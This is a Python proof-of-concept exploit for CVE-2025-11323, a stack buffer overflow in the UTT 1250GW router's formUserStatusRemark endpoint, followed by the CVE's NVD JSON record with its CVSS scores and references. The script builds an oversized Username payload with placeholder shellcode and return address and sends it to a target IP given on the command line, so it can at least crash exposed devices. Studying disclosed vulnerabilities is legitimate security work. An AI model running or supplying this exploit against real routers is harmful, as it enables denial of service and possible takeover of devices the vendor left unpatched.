CVE-2025-11323

# CVE-2025-11323 - UTT 1250GW Buffer Overflow PoC # Vulnerability: Stack-based buffer overflow via strcpy in /goform/formUserStatusRemark # Affected: UTT 1250GW up to v2v3.2.2-200710 import requests import sys TARGET_URL = "http://{target}/goform/formUserStatusRemark" USERNAME = "admin" PASSWORD = "admin" # Buffer overflow payload - oversized Username parameter # Adjust offset based on target architecture (typically MIPS for routers) BUFFER_SIZE = 1024 OFFSET = 256 # Offset to return address # Shellcode or ROP chain placeholder (architecture dependent) # For demonstration purposes - actual exploit requires target-specific shellcode shellcode = b"\x90" * 100 # NOP sled placeholder def build_payload(): """Build buffer overflow payload for formUserStatusRemark endpoint""" junk = b"A" * OFFSET # Return address placeholder - needs to be adjusted for actual exploitation ret_address = b"\x41\x41\x41\x41" padding = b"C" * (BUFFER_SIZE - OFFSET - len(ret_address) - len(shellcode)) payload = junk + ret_address + shellcode + padding return payload def exploit(target_ip): """Execute the buffer overflow exploit""" session = requests.Session() url = TARGET_URL.format(target=target_ip) # Crafted POST request with oversized Username parameter data = { "Username": build_payload().decode('latin-1'), "StatusRemark": "test" } try: response = session.post(url, data=data, timeout=10) print(f"[*] Exploit sent to {target_ip}") print(f"[*] Response status: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) exploit(sys.argv[1])

{"cve": {"id": "CVE-2025-11323", "sourceIdentifier": "[email protected]", "published": "2025-10-06T06:15:35.783", "lastModified": "2026-01-08T16:03:32.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in UTT 1250GW up to v2v3.2.2-200710. Affected is the function strcpy of the file /goform/formUserStatusRemark. This manipulation of the argument Username causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:1250gw_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.2-200710", "matchCriteriaId": "26129544-FEE2-4C29-8C44-4FDB97605BD1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:1250gw:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "00AFFB53-0AA8-42E1-8B2E-109D73D1B061"}]}]}], "references": [{"url": "https://github.com/DavCloudz/cve/issues/3", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.327206", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327206", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664524", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}